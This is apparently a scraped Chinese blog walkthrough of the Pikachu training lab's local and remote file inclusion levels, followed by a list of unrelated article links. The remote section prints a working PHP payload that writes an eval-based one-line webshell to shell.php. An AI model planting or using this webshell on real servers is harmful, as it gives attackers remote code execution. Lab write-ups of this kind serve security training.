当前位置: 首页 > news >正文

pikachu文件包含漏洞靶场(本地文件包含+远程文件包含关卡)

news 来源:原创 2024/9/20 9:39:47

本地文件包含

1.来到关卡随便点击一个提交

可以发现这里可以读取文件

这是1.txt内容

能读取到上一级文件那么也就可以读取本地文件

上传一个jpg文件

拿去连就ok了

远程包含

包含写木马的文件

该文件内容如下,其作用是在fi_remote.php文件的同级目录下新建一个文件1.txt,并将一句话木马写入shell.php

<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST['cmd']);?>")?>

然后读取这个txt文件写入shell.php这里读完后页面没有显示我们直接连一下看看

连接成功说明写进去了

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 维信小程序禁止截屏/录屏
  • sqlalchemy简单使用
  • 统一NLP和目标检测的DETR(一)——self attention、encoder、decoder
  • Android14音频进阶之定制ramdisk文件系统init服务(八十三)
  • Java Web —— 扩展(Maven高级)
  • 【2024】Datawhale X 李宏毅苹果书 AI夏令营 Task3
  • 《亿级流量系统架构设计与实战》第十二章 评论服务
  • SqlServer: 安装或升级到SqlServer2022
  • 反序列化漏洞(一)
  • 【架构-28】轮询,最小连接、随机等负载均衡算法
  • 角谷猜想——考拉兹猜想
  • springblade-JWT认证缺陷漏洞CVE-2021-44910
  • IDEA取消自动选择光标所在行
  • 【unity知识】OnAnimatorMove+root motion,Root Motion+Blend Tree,解决Animator动画和位移不同步问题
  • jupyter 安装新内核后报找不到已安装的包
  • 002-读书笔记-JavaScript高级程序设计 在HTML中使用JavaScript
  • 30秒的PHP代码片段(1)数组 - Array
  • android 一些 utils
  • android图片蒙层
  • Angular 响应式表单 基础例子
  • CentOS从零开始部署Nodejs项目
  • Cumulo 的 ClojureScript 模块已经成型
  • django开发-定时任务的使用
  • ECS应用管理最佳实践
  • Java知识点总结(JavaIO-打印流)
  • Python学习之路16-使用API
  • RxJS: 简单入门
  • scala基础语法(二)
  • Spring思维导图,让Spring不再难懂(mvc篇)
  • Wamp集成环境 添加PHP的新版本
  • 第2章 网络文档
  • 检测对象或数组
  • 开发基于以太坊智能合约的DApp
  • 每天10道Java面试题,跟我走,offer有!
  • 如何利用MongoDB打造TOP榜小程序
  • 深入浅出webpack学习(1)--核心概念
  • 译自由幺半群
  • 资深实践篇 | 基于Kubernetes 1.61的Kubernetes Scheduler 调度详解 ...
  • !!Dom4j 学习笔记
  • !!java web学习笔记(一到五)
  • #Linux(权限管理)
  • (1)虚拟机的安装与使用,linux系统安装
  • (pt可视化)利用torch的make_grid进行张量可视化
  • (二)原生js案例之数码时钟计时
  • (附源码)springboot建达集团公司平台 毕业设计 141538
  • (附源码)ssm高校志愿者服务系统 毕业设计 011648
  • (十)T检验-第一部分
  • (四)JPA - JQPL 实现增删改查
  • (一)python发送HTTP 请求的两种方式(get和post )
  • (转)Linux NTP配置详解 (Network Time Protocol)
  • (转)关于多人操作数据的处理策略
  • (转)视频码率,帧率和分辨率的联系与区别
  • ... fatal error LINK1120:1个无法解析的外部命令 的解决办法
  • .net 获取某一天 在当月是 第几周 函数
  • .NET 使用 JustAssembly 比较两个不同版本程序集的 API 变化